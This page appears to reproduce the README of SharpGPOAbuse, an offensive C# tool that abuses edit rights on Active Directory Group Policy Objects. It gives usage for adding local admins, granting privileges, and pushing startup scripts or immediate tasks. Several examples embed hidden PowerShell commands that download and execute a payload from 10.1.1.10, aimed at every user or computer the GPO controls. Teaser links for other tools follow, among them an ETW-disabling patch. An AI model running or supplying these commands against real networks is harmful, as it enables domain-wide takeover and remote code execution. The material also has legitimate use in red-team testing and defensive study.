SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user’s edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse
Compile Instructions
Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.
Usage
Usage: SharpGPOAbuse.exe <AttackType> <AttackOptions>
Attacks Types
Currently SharpGPOAbuse supports the following options:
Option | Description |
---|---|
–AddUserRights | Add rights to a user |
–AddLocalAdmin | Add a user to the local admins group |
–AddComputerScript | Add a new computer startup script |
–AddUserScript | Configure a user logon script |
–AddComputerTask | Configure a computer immediate task |
–AddUserTask | Add an immediate task to a user |
Attack Options
Options required to add new user rights:
–UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
–UserAccount
Set the account to add the new rights.
–GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe –AddUserRights –UserRights “SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight” –UserAccount bob.smith –GPOName “Vulnerable GPO”
Options required to add a new local admin:
–UserAccount
Set the name of the account to be added in local admins.
–GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe –AddLocalAdmin –UserAccount bob.smith –GPOName “Vulnerable GPO”
Options required to add a new user or computer startup script:
–ScriptName
Set the name of the new startup script.
–ScriptContents
Set the contents of the new startup script.
–GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”
If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:
SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “if %username%== powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”
Options required to add a new computer or user immediate task:
–TaskName
Set the name of the new computer task.
–Author
Set the author of the new task (use a DA account).
–Command
Command to execute.
–Arguments
Arguments passed to the command.
–GPOName
The name of the vulnerable GPO.
Additional User Task Options:
–FilterEnabled
Enable Target Filtering for user immediate tasks.
–TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format \
–TargetUserSID
The targeted user’s SID.
Additional Computer Task Options:
–FilterEnabled
Enable Target Filtering for computer immediate tasks.
–TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.
Example:
SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”
If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:
SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO” –FilterEnabled –TargetDnsName target.domain.com
Additional Options
Option | Description |
---|---|
–DomainController | Set the target domain controller |
–Domain | Set the target domain |
–Force | Overwrite existing files if required |
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…